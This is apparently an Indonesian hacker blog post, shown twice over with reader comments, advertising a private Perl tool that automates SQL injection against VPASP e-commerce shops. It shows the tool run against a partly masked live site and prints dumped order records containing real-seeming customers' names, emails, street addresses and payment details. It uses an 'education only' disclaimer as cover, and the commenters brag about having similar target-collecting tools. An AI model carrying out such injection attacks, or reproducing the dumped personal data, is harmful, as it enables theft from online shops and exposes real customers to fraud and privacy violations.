Lanjutan PenTest SQL Injection against MS-SQL Server (Bagian III)
Just another my PRIVATE tool : dump_vpasp.pl .
Skrip ini memiliki kemampuan untuk men-dump secara otomatis
isi dari database (yg penting saja tentunya) dari VPASP.
Seperti yang anda telah ketahui, VPASP adalah aplikasi e-commerce
berbasiskan ASP dengan backend database MS-SQL Server,
di mana sebagian versinya masih menyisakan bug sql injection.
SHOW TIME :
E:\data\sqlperl\baru>dump_vpasp.pl -t "http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
" -p 2 -l 10
*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!
by iko94(iko94@yahoo.com)
www.geocities.com/iko94
*********************************
http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
Format : XXXXXXX/XXXXX/XXXXXXXXXXX/ofirstname/olastname/oemail/ocity/oaddress/op
ostcode/ostate/ocountry/ophone/ocompany/ocardtype/XXXXXXX/XXXXXXXXX/ocardexpires
/ocardaddress/oprocessed/opaymethod/XXXXXXXXXXXXXX
[1] : 63664/Oct 23 2006 12:00AM/14.40/Zsolt/Koszik/zskoszik@freemail.hu/Biator
bagy/Szel u 6124/2051/NULL/HU/XXXXXXXXXXX/NULL
/Verisign - Pending/NULL/NULL/NULL/NULL/0/0/NULL
........snip...........
[10] : 63655/Oct 23 2006 12:00AM/32.45/Rudolf/Arenstorff/rudolf.arenstorff@sieme
ns.com/vienna/Kefedergrundgasse 3B/2/8/1210/Austria/AT/XXXXXXXXXXXXXXX/NULL
/Verisign/NULL/XXXXXXXXXXXX/NULL/NULL/0/0/XXXXXX
++++++++++++++++++++
E:\data\sqlperl\baru>
***FRESH*** ???
Fasilitas :
[+] seperti biasa, bisa memilih target dan jumlah quotenya
[+] bisa memilih berapa baris transaksi terakhir yang terjadi (***istimewa***),
contoh di atas memilih 10 baris terakhir dari transaksi yg terjadi
Ingat... ingat...
Skrip ini hanya untuk tujuan pendidikan saja, segala kerusakan yg diakibatkannya
tidak menjadi tanggungjawab penulis...
Sebagian dari output program di atas, penulis ganti dengan karakter XXX dengan
alasan keamanan.
Seperti biasa juga, skrip ini masih bersifat PRIVATE, yg mungkin akan didistribusikan
untuk kalangan terbatas...
Kendi, lo kebagian atu nih... (ditunggu aje...)
[+] THX to GOD, for everything...
[+] THX to Kendi, for the core alternative query
[EOF]
Skrip ini memiliki kemampuan untuk men-dump secara otomatis
isi dari database (yg penting saja tentunya) dari VPASP.
Seperti yang anda telah ketahui, VPASP adalah aplikasi e-commerce
berbasiskan ASP dengan backend database MS-SQL Server,
di mana sebagian versinya masih menyisakan bug sql injection.
SHOW TIME :
E:\data\sqlperl\baru>dump_vpasp.pl -t "http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
" -p 2 -l 10
*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!
by iko94(iko94@yahoo.com)
www.geocities.com/iko94
*********************************
http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
Format : XXXXXXX/XXXXX/XXXXXXXXXXX/ofirstname/olastname/oemail/ocity/oaddress/op
ostcode/ostate/ocountry/ophone/ocompany/ocardtype/XXXXXXX/XXXXXXXXX/ocardexpires
/ocardaddress/oprocessed/opaymethod/XXXXXXXXXXXXXX
[1] : 63664/Oct 23 2006 12:00AM/14.40/Zsolt/Koszik/zskoszik@freemail.hu/Biator
bagy/Szel u 6124/2051/NULL/HU/XXXXXXXXXXX/NULL
/Verisign - Pending/NULL/NULL/NULL/NULL/0/0/NULL
........snip...........
[10] : 63655/Oct 23 2006 12:00AM/32.45/Rudolf/Arenstorff/rudolf.arenstorff@sieme
ns.com/vienna/Kefedergrundgasse 3B/2/8/1210/Austria/AT/XXXXXXXXXXXXXXX/NULL
/Verisign/NULL/XXXXXXXXXXXX/NULL/NULL/0/0/XXXXXX
++++++++++++++++++++
E:\data\sqlperl\baru>
***FRESH*** ???
Fasilitas :
[+] seperti biasa, bisa memilih target dan jumlah quotenya
[+] bisa memilih berapa baris transaksi terakhir yang terjadi (***istimewa***),
contoh di atas memilih 10 baris terakhir dari transaksi yg terjadi
Ingat... ingat...
Skrip ini hanya untuk tujuan pendidikan saja, segala kerusakan yg diakibatkannya
tidak menjadi tanggungjawab penulis...
Sebagian dari output program di atas, penulis ganti dengan karakter XXX dengan
alasan keamanan.
Seperti biasa juga, skrip ini masih bersifat PRIVATE, yg mungkin akan didistribusikan
untuk kalangan terbatas...
Kendi, lo kebagian atu nih... (ditunggu aje...)
[+] THX to GOD, for everything...
[+] THX to Kendi, for the core alternative query
[EOF]
posted by iko @ 8:09 PM
3 Comments:
At 11:51 PM,
Anonymous said…
woh .. scriptnya mana mas ??
hehehe ...
At 6:55 PM,
iko said…
rahasia...rahasia...rahasia...
:)
At 11:10 AM,
Anonymous said…
huehauehuaue...aku juga punya mas...lengkap sama target collector,target filter..hahahah...Cayo!!!!
Post a Comment
<< Home